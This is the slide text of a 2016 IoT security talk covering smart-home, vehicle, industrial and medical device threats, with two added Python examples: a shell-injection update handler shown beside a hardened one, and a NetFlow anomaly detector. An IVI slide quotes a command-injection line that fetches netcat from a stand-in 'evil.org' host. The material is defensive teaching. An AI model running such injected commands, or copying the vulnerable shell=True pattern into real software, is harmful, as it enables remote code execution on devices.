The Internet of Threats
BILLIONS OF WAYS THE IOT POSES AN INFOSEC CHALLENGE
Chris Poulin, IoT Researcher, Futurist
CyberCrime 2016 Symposium: Cyber Convergence

The easiest way to hack an Airbus A319

About the speaker:
• Maker
• Breaker
• Threat intel
• Data geek
• Provocateur
• TV & movies

Some questions to establish context
What is your role wrt the IoT?
• Personal consumer of the IoT
• Enterprise manager of IT systems
• A maker of IoT devices
What is your biggest concern with the IoT?
• Safety (e.g., HVAC systems gone wild)
• Data privacy
• Infrastructure security (e.g., IT commingling with IoT)
• New enterprise attack vectors (e.g., end users with wearables)
Smart Home Device Examples: Home Security
• Security control and alarm panels
• Smart door locks
• Smart garage doors
• Motion detectors
• Window and door contacts
• Security cameras
• Smart doorbells

Smart Home Device Examples: Appliances, Lighting, Entertainment
(Pictured: smart fridge, smart faucet, smart lighting, smart oven, smart dishwasher, smart utensils, smart television, smart wine)
Appliances
• Refrigerators and cooktops
• Beds
• Autonomous vacuums
Lighting
• Light bulbs (plain white and color changing)
• Pathway lighting
• Indoor and outdoor
Entertainment
• Smart televisions and DVRs
• Audio systems

Smart Home Device Examples: Environment & Safety
• Smart thermostats
• Smoke / CO detectors
• Smart air conditioners
• Smart blinds
• Water leak detectors
• Baby monitors

Smart homes are vulnerable
(Illustration captions: "Buy V!gar4"; Your WiFi password is "fluffy123")

Why does home automation matter to enterprise IT security?
Mirai malware-infected devices (targets and attack volume):
• Krebs: 620-650 Gbps
• OVH: ~1 Tbps
• Dyn: Amazon, PayPal, Box, Slack, Twitter, GitHub, Netflix, Airbnb, Pinterest, Quora, Spotify, Yelp, Second Life, WWE Network affected

IIoT Device Examples: Building Automation
(Pictured: smart lighting, concrete monitors, smart doors, smart elevators)
• Electric & water
• HVAC
• Security systems
• Lighting
• Elevators and escalators
• Polarized windows
• Earthquake absorbers
• Concrete mixing & curing

And they will be connected to your IT networks
(Diagram: IT Network, BAS Network, Connected Infrastructure)
IIoT Device Examples: Smart Cities & Municipalities
(Pictured: connected cars)
• Utilities
• Lighting
• Traffic flow
• Trash
• Air quality
• Violence detection

Connected vehicle threat surface
(Diagram of in-vehicle ECUs and the channels that reach them)
• Car multimedia: Bluetooth, WiFi, media players
• Telematics: OnStar, Uconnect, etc.
• Instrument cluster / telematics
• Dynamic stability control
• Airbag control unit
• Transmission control unit
• Keyless entry / anti-theft: RF channel
• Engine control unit
• OBD-II: direct connection
• Anti-lock braking system
• Tire pressure monitor: RF channel
• Vehicle to vehicle / vehicle to infrastructure communications: DSRC RF

IVIs are messy
(Diagram of an IVI on Linux / Tizen / QNX with these modules:)
• Audio module
• Apple CarPlay
• Telematics (open source?) module
• GPS module
• Video module
• Google Android (open source?) module
• WiFi module
• Voice module
• Microsoft Sync (open source?) module
• Update feature

…so let's break one
(Diagram of the attack path; labels in order:)
• updates.txt
• somepkg '; wget http://evil.org/nc; nc …
• Port 6667/TCP
• SPI
• V850
• CAN bus
The manifest line is a command injection: the stray single quote closes the quoted package argument and the semicolons append attacker commands (fetch netcat, then run it) if the update feature builds a shell command from the line.

Number of latent vulnerabilities in a modern luxury vehicle
Using the Linux kernel as a comparative model (as of 10 Oct 2016):
• 15M lines of code in the Linux kernel
• 1,507 reported vulnerabilities
• 1 vulnerability every 9,954 lines of code
• ~10,000 latent vulnerabilities when that density is applied to a luxury vehicle's code base
Source: http://www.cvedetails.com/vulnerability-list/vendor_id-33/product_id-47/Linux-Linux-Kernel.html

The perfect storm of resources & tools
• Build your own vehicle hacking lab & test cart
• eBay, SparkFun, etc.
• Protocol decodes available:
• http://www.ioactive.com/pdfs/IOActive_Adventures_in_Automotive_Networks_and_Control_Units.pdf
• http://illmatics.com/car_hacking_poories.pdf
• http://marco.guardigli.it/2010/10/hacking-your-car.html
• http://opengarages.org/handbook/

IIoT Device Examples: Heavy Industries
Manufacturing: • Pumps • Conveyors • Robots
Energy & Utilities: • Smart meters • Transformers • Pumps • Dam gates
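Added worked example for the "…so let's break one" IVI slide above; it is not code from the talk or from any vehicle vendor. It shows an update-manifest handler that builds a shell command from a manifest line (the pattern the slide's `somepkg '; wget …; nc …` entry abuses) beside a hardened version. The manifest format, the installer command (an `echo` stand-in), and the package-name allowlist are assumptions, and the payload is a harmless `echo` in place of the slide's wget/nc so it is safe to run.

```python
import re
import subprocess

# Constructed manifest modelled on the slide's updates.txt entry (not real
# vehicle data). The payload is a harmless `echo` instead of wget/nc.
UPDATES_TXT = """\
mediaplayer
somepkg '; echo INJECTED; echo '
"""

# Assumed package-name rule: alphanumerics plus . _ + - and nothing a shell
# gives meaning to (no quotes, spaces, semicolons, backticks, $).
PKG_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._+-]{0,63}$")


def parse_manifest(text):
    """One package name per non-empty line (assumed manifest format)."""
    return [line.strip() for line in text.splitlines() if line.strip()]


def install_vulnerable(pkg):
    """Builds a shell string from untrusted manifest data and hands it to /bin/sh.

    The single quote inside the name closes the quoted argument and the
    semicolons append attacker commands, which is exactly what the slide's
    "somepkg '; wget ...; nc ..." line relies on. `echo` stands in for the
    real installer command."""
    cmd = "echo installing '%s'" % pkg
    done = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return done.stdout


def install_hardened(pkg):
    """Rejects names outside the allowlist and invokes the installer with an
    argument vector, so no shell ever parses manifest data."""
    if not PKG_NAME.match(pkg):
        raise ValueError("rejected package name: %r" % pkg)
    done = subprocess.run(["echo", "installing", pkg],
                          capture_output=True, text=True)
    return done.stdout


def process_manifest(text, installer):
    """Applies installer to each entry; returns (outputs, rejected_names)."""
    outputs, rejected = [], []
    for pkg in parse_manifest(text):
        try:
            outputs.append(installer(pkg))
        except ValueError:
            rejected.append(pkg)
    return outputs, rejected


if __name__ == "__main__":
    print("vulnerable:", process_manifest(UPDATES_TXT, install_vulnerable))
    print("hardened:  ", process_manifest(UPDATES_TXT, install_hardened))
```

With the vulnerable installer the second manifest entry produces an extra `INJECTED` line in the output, i.e. attacker-chosen commands ran; the hardened installer rejects that entry before anything executes. Input validation plus an argument vector closes the injection, but an update path also needs an authenticated manifest and package signatures, otherwise anyone who can serve updates.txt still controls what gets installed.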
Industrial IoT incidents
• German steel mill
• Stuxnet

Agricultural vulnerabilities
• Planters: seed depth
• Sprayers: dosage manipulation
• Silos: manipulate environment
• Livestock: feeding, drug, and environmental systems manipulation
• Milk: manipulate pasteurization and pH balance systems
• Hydroponics: manipulate environment
• Irrigation: manipulate control and data
• Seeds: manipulate environment
• Slaughter: remote control; effect? Who knows…
• Processing: manipulate waste system (reverse?)

IIoT Device Examples: Consumer Services
Healthcare
• X-ray machines
• Chemistry analyzers
• Pacemakers, insulin pumps
Retail
• Inventory tracking
• Stocking & picking
• Shipping

Healthcare: hacking a telesurgery unit

Wearable device examples
• Google Glass
• Android Wear
• Fitness trackers
• Apple Watch
• Insulin pumps
• Pacemakers
• Subcutaneous vitals monitor

Wearables security
(Diagram: Fitbit → Bluetooth → sync to PC → malware: PC pwned!)

Be Winston Wolfe. Solve problems.
“You’ve got a corpse in the car, minus a head. Take me to it.”

The layers of the IoT
(Layer diagram; visible label: Traditional IT Services & Security)
IoT defense for IT security professionals (1 of 4)
1. Conduct an asset inventory
• Focus on critical assets and sensitive data
• NetFlow to passively identify assets
• VA scans to actively identify assets and add context
• RF scanning (GQRX)
• Scripting skillz

IoT defense for IT security professionals (2 of 4)
2. Segment systems based on risk
• Enclave firewalls
• Software defined networks
3. Monitor & defend IoT devices on the network
• IDS / IPS
• NetFlow: look for anomalies
• Map relationships of wearables to mobile to users

IoT defense for IT security professionals (3 of 4)
4. Protect IT endpoints
• Endpoint protection software
• VA scanning / patching
• Phishing exercises
5. Collect logs and events from IoT devices
• Log management / SIEM

IoT defense for IT security professionals (4 of 4)
6. Update security policies to include IoT devices
7. Familiarize yourself with non-IT connected devices

Resources for makers
https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project http://builditsecure.ly/ https://www.iamthecavalry.org/
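Added worked example for steps 1 and 3 of the defense checklist above (passive asset inventory from NetFlow, then anomaly hunting on the same records); it is not code from the talk. The CSV layout, the address ranges, the port baseline, the threshold and the flow lines themselves are all constructed assumptions. The two checks are a Mirai-style outbound telnet (23/tcp) fan-out from one device and an IoT-enclave device reaching an external host on a port outside its baseline (6667/tcp, taken from the IVI attack-path slide, is the sample).

```python
import csv
import io
import ipaddress

# Constructed flow export in a minimal nfdump-like CSV layout (assumption, not
# real traffic). 10.20.0.0/16 is the assumed IoT/BAS enclave; 10.1.0.0/16 is IT.
FLOWS_CSV = """\
ts,src,sport,dst,dport,proto,bytes
2016-10-21T08:00:01,10.20.5.11,49152,10.0.0.5,53,udp,120
2016-10-21T08:00:02,10.20.5.11,49153,52.10.1.1,443,tcp,2900
2016-10-21T08:00:03,10.20.5.12,49200,10.0.0.5,53,udp,118
2016-10-21T08:00:04,10.20.5.12,49201,198.51.100.7,443,tcp,4100
2016-10-21T08:00:05,10.1.7.30,50000,10.0.0.5,53,udp,130
2016-10-21T08:00:06,10.1.7.30,50001,93.184.216.34,443,tcp,8800
2016-10-21T08:01:00,10.20.5.12,49300,203.0.113.9,23,tcp,60
2016-10-21T08:01:01,10.20.5.12,49301,203.0.113.10,23,tcp,60
2016-10-21T08:01:02,10.20.5.12,49302,203.0.113.11,23,tcp,60
2016-10-21T08:01:03,10.20.5.12,49303,203.0.113.12,23,tcp,60
2016-10-21T08:01:04,10.20.5.12,49304,203.0.113.13,23,tcp,60
2016-10-21T08:02:00,10.20.5.11,49160,192.0.2.44,6667,tcp,380
"""

INTERNAL_NET = ipaddress.ip_network("10.0.0.0/8")   # assumed corporate space
IOT_NET = ipaddress.ip_network("10.20.0.0/16")      # assumed IoT/BAS enclave
EXPECTED_IOT_PORTS = {53, 123, 443}                 # assumed enclave baseline
TELNET_FANOUT_THRESHOLD = 5                         # distinct 23/tcp targets


def build_inventory(csv_text):
    """Step 1: passive asset inventory from flow records.

    Returns {source_ip: {"first_seen", "enclave", "dst_ports", "external_peers"}}
    for every internal host that originated a flow. Nothing is sent to the
    devices, so fragile IoT gear is never touched (unlike an active VA scan)."""
    inventory = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        src = ipaddress.ip_address(row["src"])
        if src not in INTERNAL_NET:
            continue  # inbound flows from outside are not assets of ours
        entry = inventory.setdefault(str(src), {
            "first_seen": row["ts"],
            "enclave": "iot" if src in IOT_NET else "it",
            "dst_ports": set(),
            "external_peers": set(),   # (dst_ip, dport, proto) outside 10/8
        })
        dport = int(row["dport"])
        entry["dst_ports"].add(dport)
        dst = ipaddress.ip_address(row["dst"])
        if dst not in INTERNAL_NET:
            entry["external_peers"].add((str(dst), dport, row["proto"]))
    return inventory


def find_anomalies(inventory):
    """Step 3: flow-based anomaly checks over the inventory.

    Returns a list of (host, reason). Rule 1 catches Mirai-style propagation,
    which scans many hosts for telnet; rule 2 catches an enclave device talking
    to the outside on a port that is not in its baseline."""
    findings = []
    for host, entry in sorted(inventory.items()):
        telnet_targets = {dst for dst, port, proto in entry["external_peers"]
                          if port == 23 and proto == "tcp"}
        if len(telnet_targets) >= TELNET_FANOUT_THRESHOLD:
            findings.append((host, "outbound 23/tcp fan-out to %d external hosts"
                             % len(telnet_targets)))
        if entry["enclave"] == "iot":
            odd_ports = sorted({port for _, port, _ in entry["external_peers"]
                                if port not in EXPECTED_IOT_PORTS})
            if odd_ports:
                findings.append((host, "IoT device reached external hosts on "
                                 "unexpected port(s) %s"
                                 % ", ".join(map(str, odd_ports))))
    return findings


if __name__ == "__main__":
    inv = build_inventory(FLOWS_CSV)
    for host, entry in sorted(inv.items()):
        print(host, entry["enclave"], sorted(entry["dst_ports"]))
    for host, reason in find_anomalies(inv):
        print("ALERT", host, reason)
```

On the constructed flows, 10.20.5.12 is flagged for telnet fan-out (and for 23/tcp being outside the enclave baseline), 10.20.5.11 for the 6667/tcp connection, and the IT host 10.1.7.30 is not flagged. In practice the inventory is rebuilt continuously so that a device whose external peers change is noticed, and the baseline per enclave comes from what the segmentation in step 2 says those devices are allowed to do.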